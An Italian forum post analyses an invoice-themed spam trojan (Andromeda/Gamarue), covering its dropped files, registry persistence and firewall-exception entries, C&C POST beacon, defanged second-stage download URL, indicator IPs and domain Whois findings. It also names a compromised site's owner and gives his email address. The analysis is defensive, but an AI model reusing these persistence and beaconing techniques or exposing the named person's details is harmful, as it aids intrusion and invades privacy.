- Nome del virus e sue varianti:
- Kaspersky: Trojan.Win32.Jorik.Androm.u
- MSE: Worm:Win32/Gamarue.B
- AhnLab-V3: Spyware/Win32.Zbot
- Tipologia: Worm / BOT
- Sistemi Operativi affetti: Windows
- Descrizione/Note: Virus presente in un email di spam ricevuta da un conoscente.
- Articoli su MegaLab.it inerenti e altri link utili
- Discussione forum MegaLab
Recentemente ho notato l'invio massiccio di email simili a questa:
Mittente: PAY (VMyrick@[rimosso].net)
Oggetto: Pagamento 1XXX-XXX (XXX numeri casuali)
Messaggio:
Buongiorno,
Si prega di notare che hai una fattura.
hxxp://technofluid.ro/account/Fattura.zip?XXXX (X caratteri alfanumerici casuali per il referer)
Tel./Fax.: +39 (39) 646 97 61
Attualmente l'archivio zip malevolo è stato rimosso e non è più disponibile.
Introduzione:
Navigando alla radice del sito web technofluid ottengo un errore 403 di Accesso Negato.
Leggendo le informazioni Whois del sito scopro che malgrado il dominio del sito sia rumeno (.ro) questo è ospitato su di un server italiano gestito da Aziende Italia S.r.l..
Successivamente interrogo il Whois di RoTLD e leggo che il possessore del dominio è Mazzanti Matteo, viene fornito un indirizzo relativo a Bucarest, il numero di telefono e di fax di questo signore e la relativa email matteo.mazzanti[ at ]hotmail.com. Ho verificato tramite mailtester.com l'esistenza di questo indirizzo e sembra essere valido.
Aziende Italia S.r.l. è una compagnia italiana che si occupa di ospitare a pagamento il sito web.
La discrepanza tra la nazionalità del server sul quale è hostato il sito e il domino registrato è spiegabile: Matteo Mazzanti è il propietario del business TECHNO FLUID S.r.l. con sede In Romania, e si affida ad un hoster italiano per ospitare il sito.
Il dominio è registrato dal 2001, probabilmente il sito web è stato compromesso ed utilizzato per veicolare il malware studiato in questa analisi.
Come possiamo notare all'interno dell'email è presente un link per scaricare la presunta fattura, dopo il nome del file Fattura.zip? sono presenti da quattro a 6 cifre alfanumeriche (oscurate per privacy) che servono a tracciare il download.
All'interno dell'archivio zip è presente un unico file, Fattura.Pdf, il nome include 66 underscore per nasconderne la reale natura di eseguibile.
Tra le informazioni si può leggere che il campione è stato creato il 19 Ottobre. Il file si spaccia come plugin per Cyberlink (CES System PlugIn 6).
La dimensione del file è di 55 kb; il file è compresso utilizzando UPX 3.0.7 per ridurre le rilevazioni, l'entropia del è infatti pari a 7.73099/8 (96.6374%) ciò indica che il file è sicuramente compresso o offuscato.
Il malware è programmato con Microsoft Visual Studio 2010.
Al momento dell'analisi il file era classificato come malevolo solo da Ahnlab, Kaspersky, Norman.
Comportamento del campione:
Il file Fattura crea 4 eventi: fuckmss, fuckmss1, fuckmss2, fuckmss3. Viene lanciato il processo legittimo svchost.exe.
Successivamente crea il file 111818854.log e lo salva in AppData, crea il file dbs.dat e lo salva in Application Data\firewall\.
Viene creato il file 00110694.tmp in una directory temporanea, viene creato il file system.exe (vuoto) in Application Data\firewall\ e viene lanciato come processo.
Mediante il comando dos copy il file 00110694.tmp viene copiato in Application Data\firewall\ sovrascrivendolo a system.exe (conservando come nome system.exe).
Mediante il comando dos del il file dbs.dat viene eliminato. Mediante il comando dos ren il file system.exe viene rinominato in 7523.bak. Mediante il comando dos taskkill /F /IM system.exe il processo system.exe viene terminato.
Viene creato nuovamente system.exe e lanciato come processo. Viene creato il file 0060ffef.com (identico al campione originale fattura.pdf).
Si imposta l'avvio automatico del file system.exe:
- Codice: Seleziona tutto
HKEY_LOCA_MACHINE\Software\microsoft\Windows NT\CurrentVersion\Winlogon\shell = Explorer.exe "C:\Documents and Settings\Administrator\Application Data\firewall\system.exe"
Si imposta l'avvio automatico del file 0060ffef.com:
- Codice: Seleziona tutto
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run [2600] = C:\DOCUME~1\ALLUSE~1\LOCALS~1\Temp\0060ffef.com
Viene aggiunta un eccezione al Firewall di Windows per consentire le connessioni alla rete da parte di system.exe:
- Codice: Seleziona tutto
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrator\Application Data\firewall\system.exe = C:\Documents and Settings\Administrator\Application Data\firewall\system.exe:*:Enabled:system.exe
Secondo Buster Sandbox Analyzer il campione possiede anche funzionalità di Keylogger.
Il file Fattura.Pdf si autoelimina.
Si imposta il seguente Mutex per marcare la presenza del malware nel sistema:
- Codice: Seleziona tutto
Andromeda
Si imposta l'attributo “Nascosto” per i seguenti files: system.exe, 00110694.tmp, 0060ffef.com.
Avviene una connessione ad internet tramite Winsock verso 87.126.200.246 sulla porta 80 (hxxp://www.duffiduffid.ru):
- Codice: Seleziona tutto
OUT,TCP – HTTP 192.168.XXX.XXX, 87.126.200.246:80
IN,TCP – HTTP 87.126.200.246:80, 192.168.XXX.XXX
Avviene una connessione ad internet tramite Winsock verso 60.19.30.135 sulla porta 80 (dzmeritelshop.ru):
- Codice: Seleziona tutto
OUT,TCP – HTTP 192.168.XXX.XXX, 60.19.30.135:80
IN,TCP – HTTP 60.19.30.135:80, 192.168.XXX.XXX
Viene scaricato un malware dal seguente url:
hxxp://dzmeritelshop.ru/dbs/0088.exe
Analisi dei files:
Dopo tutti i “magheggi” il file system.exe si presenta come Trojan Spamavicon che si connette a YahooStat.com, sito ospitato in Lituania al momento non più raggiungibile. Un Trojan che utilizza il computer per inviare mail indesiderate a terzi.
Il file system.exe è compresso con UPX 3.0.7, la sua entropia è 7.87713/8 (98.4641%) il suo hash MD5 è il seguente: 4f04cb4e57068c0a84d645ad9d640300. Viene ampiamente rilevato dagli antivirus.
Il file 111818854.log contiene 5 cifre numeriche che vengono utilizzate per tracciare ed identificare l'utente.
Modifiche al registro di sistema (escluse quelle menzionate nell'analisi):
Viene creato il seguente valore:
- Codice: Seleziona tutto
[HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket] "NukeOnDelete=00000001"
Che permette di eliminare i file e le cartelle senza farli passare dal cestino.
Viene aggiunta questa voce:
- Codice: Seleziona tutto
HKEY_LOCAL_MACHINE\software\microsoft\AA
Utilizzata per marcare la presenza del malware nel sistema
Viene creato il seguente valore:
- Codice: Seleziona tutto
[HKEY_CURRENT_USER\software\classes] "SymbolicLinkValue"=5C00520045004700490053005400520059005C0055005300450052005C00530061006E00640062006F0078005F00410064006D0069006E006900730074007200610074006F0072005F00580075006C0062006F0078005C0075007300650072005C00630075007200720065006E0074005F0063006C0061007300730065007300
Questo speciale valore è un link simbolico ed offre una funzione molto importante: Un link simbolico permette di collegare una chiave di registro con un'altra. Il valore del link simbolico è rappresentato da una stringa Unicode (non possiede limiti di lunghezza).
Deoffuscato il link diventa:
- Codice: Seleziona tutto
\REGISTRY\USER\Sandbox_Administrator_XXXXXX\user\current_classes
Il percorso per il registro di sistema è espresso nella sintassi di accesso al registro da parte del Kernel.
Viene creata la seguente chiave di registro con un valore calcolato sul sistema infetto (sembrerebbe un hash MD5):
- Codice: Seleziona tutto
[HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Applets\Scandisk\data] “id”=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Viene modificato il valore della chiave:
- Codice: Seleziona tutto
HKEY_CURRENT_USER\current\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Analisi del traffico di rete:
AVVISO: Nel pacchetto contenente l'analisi è presente un file pcacp generato da Anubis, non ho incluso quello registrato durante la mia analisi per motivi di privacy.
Inizialmente possiamo notare un interrogazione DNS per hxxp://www.duffiduffid.ru:

Con le relative risposte:

Tramite una richiesta HTTP POST:
- Codice: Seleziona tutto
POST /stat/stat3.php HTTP/1.1
Host: http://www.duffiduffid.ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Connection: close
viene inviato il seguente valore:
- Codice: Seleziona tutto
data=nnniqklikjonknyfxaxfxgnhrilhskxmnkolubkiyhwfmgykrbvnldwmqduesbtmwmolnepoqkmerixj

Non so esattamente a cosa serva questa stringa, ma il suo contenuto è variabile, probabilmente viene utilizzata per riportare l'avvenuta infezione al server C&C e/o per identificare la macchina infetta.
Avviene un interrogazione DNS a dzmeritelshop.ru

Con le relative risposte:

Tramite una richiesta HTTP GET viene richiesto il file 0088.exe presente al seguente url:
hxxp://dzmeritelshop.ru/dbs/0088.exe

Unendo i vari pacchetti dal dump (o scaricandolo dall'indirizzo sopra indicato) si ottiene un file di 137 kb (140288 bytes)
Le informazioni su questo file sono le seguenti:
Il file possiede un entropia pari a 7.877126/8 (98.4641%) ed è compresso con UPX 3.0.7. Questa è la versione finale del file system.exe.

Tramite un pacchetto di controllo ACK si notifica l'avvenuta ricezione dei precedenti pacchetti, curioso il nome del pacchetto Window Update:

Maggiori informazioni sono presenti nel file pcap.
Approfondimento **Diffusione e Hosting**:
Ecludendo l'analisi su Technofluid che ho già menzionato prima passiamo a hxxp://www.duffiduffid.ru.
Cercando i dati Whois per duffiduffid ottengo poche informazioni:
Il detentore del dominio è sconosciuto (Private Person), il dominio è stato registrato il 05/10/2011 presso NAUNET-REG-RIPN.
Interrogando il Wohis di NAUNET non ottengo maggiori informazioni.
E' degno di nota il commento dell'utente MarkGiles (WOT) che riporta: “Un azienda situata in Russia - NAUNET-REG-RIPN – accetta contratti di servizio da criminali per nomi di dominio .ru (russi). Questi criminali stanno facendo scendere la reputazione ad un livello sempre più basso. Una ricerca sullo spam condotta ad Ottobre mostrava che il 93.16% delle email inviate nell'arco di 5 giorni – 218 / 234 domini – provenivano da NAUNET-REG-RIPN.
Il sito Spam Trackers EU classifica NAUNET-REG-RIPN in questo modo: “Ignora le richieste di sospendere i domini illegali”.
DuffiDuffid.ru è presente nella lista dei domini bloccati di Spamhaus. Il sito è classificato come pericoloso e di phishing da SURBL.
Una cosa curiosa che ho notato è che non si riesce a capire bene dove sia ospitato questo sito:
Probabilmente è ospitato in Cina, Robtex mi indica 5 indirizzi ip dove posso trovare il sito web:
Due Cinesi con ip differenti ma che si riferiscono allo stesso provider presenti su malwaredomainlist.com, su Spamhaus per aver ospitato server di una botnet SpyEye e suo Autoshun per aver ospitato server di una botnet Zeus, uno Americano classificato da Autoshun come Zeus C&C, Polonia classificato da Autoshun allo stesso modo e da Spamhaus come ZeuS botnet controller e Bulgaria presente nella Open blocklist per aver effettuato tre attacchi di bruteforce sulle macchine fantoccio.
Anche l'altro sito dzmeritelshop.ru ha registrato il proprio dominio con NAUNET.
Interrogando il Whois si presenta una situazione analoga alla precedente, poche informazioni, il detentore è Private Person, il dominio è stato registrato il 04/09/2011.
Dzmeritelshop.ru è presente nella lista di domini bloccati da Spamhaus e viene segnalato come pericoloso da molte altre liste.
Anche per Robtex situazione analoga, mi indica 4 indirizzi ip dove è ospitato il sito web. Tre dei quali sono gli stessi dell'altro sito (America, Bulgaria, Polonia). Il restante ip anch'esso Americano è noto per aver ospitato server di controllo Zeus ed è presente nella malwaredomainlist.com.
Auguro a tutti una buona lettura e invito i lettori a segnalarmi sviste o errori.
![Armato (e pericoloso) [weponed]](http://www.megalab.it/forum/images/smilies/gunsmilie.gif)
![Armato (e pericoloso) [weponed]](http://www.megalab.it/forum/images/smilies/gunsmilie.gif)